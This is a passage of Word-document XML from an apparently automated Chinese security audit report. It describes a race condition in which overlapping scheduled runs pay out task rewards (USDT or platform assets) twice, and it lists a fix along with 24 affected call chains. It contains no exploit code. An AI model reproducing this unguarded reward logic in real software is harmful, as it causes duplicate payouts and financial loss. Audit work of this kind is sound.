              <w:t xml:space="preserve">            reward.getMinerLevel());</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利用路径（系统条件触发，无需主动攻击）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前提条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：系统中存在大量 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 且已绑定 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>openId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的用户，或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>coinWService.firstTrade()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 外部接口响应较慢（例如：单次调用约 1 秒，用户数 &gt; 600 人即可触发 Run 超时重叠）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1300"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T=0：Run-1 启动，从数据库查询 N 个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 用户，开始顺序处理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T=10min：Run-2 启动，Run-1 尚未处理完后段用户，数据库中这些用户仍为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，Run-2 的查询包含这些用户；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1303"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run-1 与 Run-2 并发处理同一用户，均调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1304"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 事务并发执行非每日任务分支，均读到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status &lt; 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1305"/>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：同一用户的任务完成奖励（USDT 或平台虚拟资产）被重复发放，造成平台资产损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（系统自动调度，无需任何用户操作）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1307"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：系统内部条件竞争，外部攻击者无需介入，系统高负载/大用户量时自然触发</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对比参照（正确实现，每日任务分支已有）</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每日任务分支使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DailyTaskAwardIssued</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 唯一约束 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DataIntegrityViolationException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 捕获，正确实现了并发幂等。非每日任务分支应采用等价保护——例如引入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 联合唯一约束的发奖记录表，或对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 悲观锁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 23 条路径命中同一漏洞，详情已折叠（完整路径见下方「🔗 受影响调用链」）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔗 受影响调用链（24 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1308"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.firstTradeTask → TaskExecutionService.java.updateProgress → TaskExecutionService.java.applyReward → TaskRewardConfigRepository.java.findByTaskIdOrderBySortOrderAsc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1309"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.firstTradeTask → TaskExecutionService.java.updateProgress → TaskExecutionService.java.applyReward → TaskRewardConfig.java.getRewardValue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1310"/>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UserTaskRecordRepository.java.findByUserIdAndTaskId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1311"/>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UserTaskRecord.java.getCurrentProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1312"/>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UserTaskRecord.java.setCurrentProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1313"/>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UserTaskRecord.java.setTargetProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1314"/>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UserTaskRecord.java.getStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1315"/>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UserTaskRecord.java.setCompleteTime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1316"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.firstTradeTask → TaskExecutionService.java.updateProgress → TaskConfig.java.getTaskType</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.firstTradeTask → TaskExecutionService.java.updateProgress → DailyTaskCompleteRecord.java.setUserId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1318"/>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TaskExecutionService.java.applyReward → TaskRewardConfigRepository.java.findByTaskIdOrderBySortOrderAsc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1319"/>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TaskExecutionService.java.applyReward → TaskRewardConfig.java.getRewardType</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1320"/>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TaskExecutionService.java.applyReward → TaskRewardConfig.java.getRewardValue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1321"/>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UserTaskRecordRepository.java.findByUserIdAndTaskId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1322"/>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DailyTaskAwardIssuedRepository.java.existsByUserIdAndTaskIdAndCompleteDate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1323"/>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TriggerConditionEnum.java.fromLabel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1324"/>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UserTaskRecord.java.getCurrentProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1325"/>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UserTaskRecord.java.setCurrentProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1326"/>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UserTaskRecord.java.getStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1327"/>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UserTaskRecord.java.setStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1328"/>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UserTaskRecord.java.setCompleteTime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1329"/>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TaskConfig.java.getTaskType</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1330"/>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TaskConfig.java.getTriggerCondition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1331"/>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DailyTaskCompleteRecord.java.setUserId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audit_m265_1139_firstTradeTask_ctrl-path1of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1153_firstTradeTask_ctrl-path3of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1191_firstTradeTask_ctrl-path11of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1233_firstTradeTask_ctrl-path17of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1237_firstTradeTask_ctrl-path18of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1240_firstTradeTask_ctrl-path19of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1242_firstTradeTask_ctrl-path20of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1248_firstTradeTask_ctrl-path22of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1253_firstTradeTask_ctrl-path24of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m265_1259_firstTradeTask_ctrl-path27of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1156_userKycVerifiedTask_ctrl-path1of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1161_userKycVerifiedTask_ctrl-path2of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1168_userKycVerifiedTask_ctrl-path3of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1228_userKycVerifiedTask_ctrl-path11of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1235_userKycVerifiedTask_ctrl-path13of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1238_userKycVerifiedTask_ctrl-path14of29.md</w:t>
      </w:r>
      <w:r>
